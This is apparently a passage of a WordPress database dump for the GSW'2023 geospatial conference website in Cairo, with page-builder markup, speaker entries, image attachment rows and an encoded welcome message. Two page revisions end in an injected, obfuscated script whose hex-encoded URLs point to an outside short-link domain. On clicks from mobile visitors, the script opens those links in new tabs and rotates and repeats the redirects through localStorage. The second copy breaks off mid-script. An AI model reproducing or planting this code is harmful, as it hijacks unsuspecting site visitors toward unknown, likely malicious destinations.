main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_team_masonry img_border_radius=\"0px\" bwb_columns=\"desktop:2|h_tablet:2|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:47:52','2022-10-06 19:47:52','',2167,'https://gsw2023.com/?p=2324',0,'revision','',0),
(2325,1,'2022-10-06 20:12:27','2022-10-06 20:12:27','','aast2','','inherit','open','closed','','aast2','','','2022-10-06 20:12:27','2022-10-06 20:12:27','',2167,'https://gsw2023.com/wp-content/uploads/2022/10/aast2.png',0,'attachment','image/png',0),
(2326,1,'2022-10-06 20:13:28','2022-10-06 20:13:28','','isprs','','inherit','open','closed','','isprs','','','2022-10-06 20:13:28','2022-10-06 20:13:28','',2167,'https://gsw2023.com/wp-content/uploads/2022/10/isprs.png',0,'attachment','image/png',0),
(2327,1,'2022-10-06 20:14:05','2022-10-06 20:14:05','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_team_masonry img_border_radius=\"0px\" bwb_columns=\"desktop:2|h_tablet:2|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"\"][vc_masonry_media_grid element_width=\"6\" grid_id=\"vc_gid:1665119259246-2c5e5f13-c051-1\" include=\"2325,2326\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 